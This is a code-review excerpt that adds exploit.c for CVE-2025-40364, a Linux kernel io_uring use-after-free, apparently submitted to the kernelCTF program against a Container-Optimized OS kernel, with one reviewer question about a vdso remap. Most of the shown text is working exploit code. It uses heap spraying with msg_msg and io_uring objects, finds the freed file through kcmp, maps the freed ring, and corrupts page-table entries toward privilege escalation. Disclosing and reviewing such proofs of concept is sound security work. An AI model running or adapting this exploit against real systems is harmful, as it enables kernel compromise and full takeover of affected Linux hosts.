pocs/linux/kernelctf/CVE-2025-40364_lts_cos/exploit/cos-109-17800.372.84/exploit.c

```diff
@@ -0,0 +1,800 @@
+        {
+            struct io_uring_params params = {};
+            uufd[i] = SYSCHK(syscall(SYS_io_uring_setup, 1, &params));
+            dfd[i] = -1;
+        }
+        puts("Retry");
+        exit(-1);
+        goto retry;
+    }
+
+    msg.mtype = 2;
+    memset(&msg.mtext[0], 0, 0x2000);
+    *(size_t *)(&msg.mtext[0x1000 - 0x30 - 8 + 8]) = f_leak;
+    *(size_t *)(&msg.mtext[0x1000 - 0x30 - 8 + 16]) = f_leak;
+
+    for (int i = 0; i < 0x400; i++)
+        msgsnd(msqid[i], &msg, 0x1000 - 0x30 + 0x80 - 8, 0);
+
+    int fds[] = {-1, -1, -1};
+    struct io_uring_rsrc_update2 reg = {
+        .offset = 1,
+        .data = (size_t)&fds};
+    for (int i = 0; i < 0x100; i++)
+        SYSCHK(syscall(__NR_io_uring_register, uufd[i], IORING_REGISTER_FILES_UPDATE, &reg, 2));
+
+    sleep(5);
+
+    for (int i = 0; i < 0x100; i++)
+    {
+        memset(&params, 0, sizeof(params));
+        uuufd[i] = SYSCHK(syscall(SYS_io_uring_setup, 0x1000, &params));
+    }
+    set_cpu(0);
+    size_t *uaf = NULL;
+    pid_t mypid = getpid();
+    int passwd = memfd_create("x", 0);
+    fallocate(passwd, 0, 0, 0x1000);
+    for (int i = 0; i < 0x2000; i++)
+        addrs[i] = mmap((void *)(0x200000UL * i + 0x40000000), 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, passwd, 0);
+
+    for (int i = 0; i < 0x100; i++)
+    {
+        for (int j = 0; j < 0x100; j++)
+            if (syscall(SYS_kcmp, mypid, mypid, KCMP_FILE, vfd[i], uuufd[j]) == 0)
+            {
+                puts("Found !!");
+                uaf = SYSCHK(mmap(NULL, params.sq_entries * sizeof(struct io_uring_sqe), PROT_READ | PROT_WRITE, MAP_SHARED, uuufd[j], IORING_OFF_SQES));
+                close(vfd[i]);
+                close(uuufd[j]);
+                break;
+            }
+        if (uaf != 0)
+            break;
+    }
+    printf("%p 0x%lx\n", uaf, params.sq_entries * sizeof(struct io_uring_sqe));
+    PAUSE;
+    {
+
+        char empty[0x1000] = {};
+
+        for (int i = 0; i < 0x2000; i++)
+            addrs[i][0] = 0x1234;
+
+        size_t A = 0;
+        size_t *leaks_B = NULL;
+        size_t flags = 0;
+        for (int i = 0; i < 0x40; i++)
+        {
+            if ((uaf[0] & 0xff) == 0x67)
+            {
+                puts("Found Page Table");
+                flags = uaf[0] = (uaf[0] & 0xfff);
+                for (int k = 0; k < 0x2000; k++)
+                {
+                    if (addrs[k][0] != 0x1234)
+                    {
+                        A = k;
+                        leaks_B = uaf;
+                        puts("Found Page Table 2");
+                        break;
+                    }
+                }
+
+                break;
+            }
+            if (leaks_B)
+                break;
+            uaf += (0x1000 / 8);
+        }
+
+        void *vdso = (void *)getauxval(AT_SYSINFO_EHDR);
+        SYSCHK(mremap(vdso - 0x4000, 0x4000, 0x4000, MREMAP_MAYMOVE | MREMAP_FIXED, addrs[A] + (0x1000 / 8)));
```

Comment:
What's at `vdso - 0x4000` and why you can map this into user-space this way? Wouldn't this be an invalid address in the user-space? It contains the `_vdso_data` pointer, but you can read it directly from the original mapping?